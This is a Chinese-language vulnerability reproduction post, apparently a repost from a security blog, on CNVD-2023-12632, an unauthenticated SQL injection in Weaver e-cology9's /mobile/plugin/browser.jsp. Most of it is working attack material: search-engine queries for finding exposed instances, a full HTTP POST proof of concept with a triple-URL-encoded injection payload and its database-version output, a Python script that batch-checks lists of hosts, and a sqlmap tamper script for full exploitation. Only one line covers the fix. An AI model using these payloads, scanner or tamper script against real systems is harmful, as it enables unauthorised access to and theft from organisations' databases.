【CNVD-2023-12632】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用
一、产品介绍 泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协 2023-4-28 09:56:30 Author: 网络安全透视镜(查看原文) 阅读量:256 收藏
一、产品介绍 泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协 2023-4-28 09:56:30 Author: 网络安全透视镜(查看原文) 阅读量:256 收藏
一、产品介绍
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
二、漏洞概述
泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
三、影响范围
泛微e-cology9 <= 10.55
四、漏洞复现
Fofa搜索:app="泛微-协同商务系统"Hunter搜索:title=="泛微-协同软件的精英团队,我们的目标:造就协同软件第一品牌!"
POC
POST /mobile/plugin/browser.jsp HTTP/1.1Host:IP/域名:端口User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 1141DNT: 1Connection: closeCookie: ecology_JSessionid=aaaDJa14QSGzJhpHl4Vsy; JSESSIONID=aaaDJa14QSGzJhpHl4Vsy; __randcode__=28dec942-50d2-486e-8661-3e613f71028aUpgrade-Insecure-Requests: 1isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
返回数据如下:
{"autoCount":true,"autoGet":true,"baseSql":"","browserUrl":"","conditions":[],"countSql":"","first":1,"hasNext":false,"hasPre":false,"isUsed":true,"names":[],"nextPage":1,"operates":[],"orderbys":[],"orders":[],"pageNo":1,"pageSize":10,"prePage":1,"result":[{"show2":"","show1":"Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) \n\tApr 2 2010 15:48:46 \n\tCopyright (c) Microsoft Corporation\n\tEnterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)\n\r\n\r\n\r\n\r\n%","id":1}],"totalCount":0,"totalPages":0,"values":[]}
SQL注入的返回值会出现在result -> show1 字段中
检测代码
单个 python3 e-cology9_sqlcheck.py -u url
批量 python3 e-cology9_sqlcheck.py -f filename
#!/usr/bin/python3.9# -*- coding: utf-8 -*-import requestsimport argparserequests.packages.urllib3.disable_warnings()def usage():print('''+-----------------------------------------------------------------+使用方法:单个 python3 e-cology9_sqlcheck.py -u url批量 python3 e-cology9_sqlcheck.py -f filename+-----------------------------------------------------------------+''')proxies = {'http':'http://127.0.0.1:8080'}headers = { 'Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9','x-forwarded-for': '127.0.0.1','x-originating-ip': '127.0.0.1','x-remote-ip': '127.0.0.1','x-remote-addr': '127.0.0.1','Content-Type': 'application/x-www-form-urlencoded'}data = "isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537"def check(url):try:target_url = url + "/mobile/plugin/browser.jsp"res = requests.post(target_url, verify=False, timeout=5,headers=headers, data=data)if 'Microsoft SQL Server' in res.text:with open('success.txt', 'a') as f:print(f"Host: {url} is vulnerability")f.write("host" + " : " + url + "\n")else:print(f"Host: {url} is not vulnerability")except Exception as e:print(f"Host: {url} Connection Fail")# with open('fail.txt', 'a')as f:# f.write("host"+" : " + url +"\n")def run(filepath):urls = [x.strip() for x in open(filepath, "r").readlines()]for u in urls:check(u)return checkdef main():parse = argparse.ArgumentParser()parse.add_argument("-u", "--url", help="python e-cology9_sqlcheck.py -u url")parse.add_argument("-f", "--file", help="python e-cology9_sqlcheck.py -f file")args = parse.parse_args()url = args.urlfilepath = args.fileif url is not None and filepath is None:check(url)elif url is None and filepath is not None:run(filepath)else:usage()if __name__ == '__main__':main()
五、漏洞利用
利用SQLmap进行注入
由于payload需要三次url编码,需要自定义tamper脚本,脚本如下
import urllib.parsedef tamper(payload, **kwargs):# URL encoding for all charactersencoded_payload = urllib.parse.quote(payload)encoded_payload = urllib.parse.quote(encoded_payload)encoded_payload = urllib.parse.quote(encoded_payload)encoded_payload = encoded_payload.replace(' ', '%20')return encoded_payload
将自定义的payload脚本放入 sqlmap 的tamper目录下,直接调用即可
六、漏洞修复
下载官方补丁修复,升级至10.56及以上版本。
https://www.weaver.com.cn/cs/securityDownload.asp#
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247494692&idx=1&sn=8731cfbf92960c489b37e7d72f8e4bd3&chksm=974c4b1ca03bc20ace4fdc793719aa391de83fe25b1fccb2a35ec6b2c2f393585c2e2c2fc14d#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh